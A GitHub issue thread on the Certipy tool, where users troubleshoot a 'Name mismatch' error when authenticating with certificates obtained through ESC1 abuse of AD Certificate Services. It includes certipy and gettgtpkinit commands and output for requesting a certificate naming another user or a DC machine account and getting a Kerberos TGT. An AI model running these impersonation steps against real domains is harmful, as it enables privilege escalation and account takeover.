search

ly4k / Certipy

Tool for Active Directory Certificate Services enumeration and abuse
MIT License
2.38k stars 327 forks source link

Name mismatch between certificate and user even though they match #34

Closed tmoney11 closed 2 years ago

tmoney11 commented 2 years ago

So I've got a few certs identified with ESC1 possible and I'm able to request certificate with -alt otheruser and output looks like this:

[+] Trying to resolve 'CA.FULL.DOMAIN.COM' at '192.168.1.101'
[*] Requesting certificate
[+] Trying to resolve dynamic endpoint '91AE6020-xxxxxx'
[+] Resolved dynamic endpoint '91AE6020-xxxxx' to 'ncacn_ip_tcp:192.168.1.101[59431]'
[+] Trying to connect to endpoint: ncacn_ip_tcp:192.168.1.101[59431]
[+] Connected to endpoint: ncacn_ip_tcp:192.1681.101[59431]
[*] Successfully requested certificate
[*] Request ID is 5063
[*] Got certificate with UPN 'otheruser'
[*] Saved certificate and private key to 'otheruser.pfx'

However, when I run: certipy auth -pfx otheruser.pfx -username 'otheruser' -domain 'full.domain.com' -dc-ip 192.168.1.100 I get:

[*] Using principal: otheruser@full.domain.com
[*] Trying to get TGT...
[-] Name mismatch between certificate and user otheruser'
[-] Verify that the username 'otheruser' matches the certificate UPN: otheruser

CA Server is 2016. I've tried multiple vulnerable certs as well as just running without the alt flag but no luck.

ly4k commented 2 years ago

Can you try to request the ESC1 with -alt 'otheruser@full.domain.com' instead?

vysecurity commented 2 years ago

Did you ever figure this one out? It's still having this issue now.

Cyb3rGh0st786 commented 1 year ago

Same for me as well. Also, in the latest version, there is no -alt flag, I guess

@ly4k would you please help with this?

ly4k commented 1 year ago

Hello. The newest version contains the -upn flag to specify a UPN. Please try to specify the UPN as user@domain rather than just user.

Best regards

noraj commented 6 months ago

There is no -alt or -upn or -dns option for certipy auth command.

Something like that.

➜ certipy auth -pfx dc_machine_account.pfx -dc-ip 10.0.0.1       
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Using principal: dc_machine_account$@acme.local
[*] Trying to get TGT...
[-] Name mismatch between certificate and user 'dc_machine_account$'
[-] Verify that the username 'dc_machine_account$' matches the certificate DNS Host Name: dc_machine_account.acme.local
noraj commented 6 months ago

Same mismatch error with impacket directly:

➜ gettgtpkinit -cert-pfx $(pwd)/dc_machine_account.pfx -pfx-pass '' -dc-ip 10.0.0.1 'acme.local/dc_machine_account$' dc_machine_account.tgt               
2024-04-15 15:46:29,807 minikerberos INFO     Loading certificate and key from file
INFO:minikerberos:Loading certificate and key from file
2024-04-15 15:46:29,867 minikerberos INFO     Requesting TGT
INFO:minikerberos:Requesting TGT
Traceback (most recent call last):
  File "/usr/share/pkinittools/gettgtpkinit.py", line 349, in <module>
    main()
  File "/usr/share/pkinittools/gettgtpkinit.py", line 345, in main
    amain(args)
  File "/usr/share/pkinittools/gettgtpkinit.py", line 315, in amain
    res = sock.sendrecv(req)
          ^^^^^^^^^^^^^^^^^^
  File "/usr/lib/python3.11/site-packages/minikerberos/network/clientsocket.py", line 85, in sendrecv
    raise KerberosError(krb_message)
minikerberos.protocol.errors.KerberosError:  Error Name: KDC_ERR_CLIENT_NAME_MISMATCH Detail: "Error message not found! Err code: 75"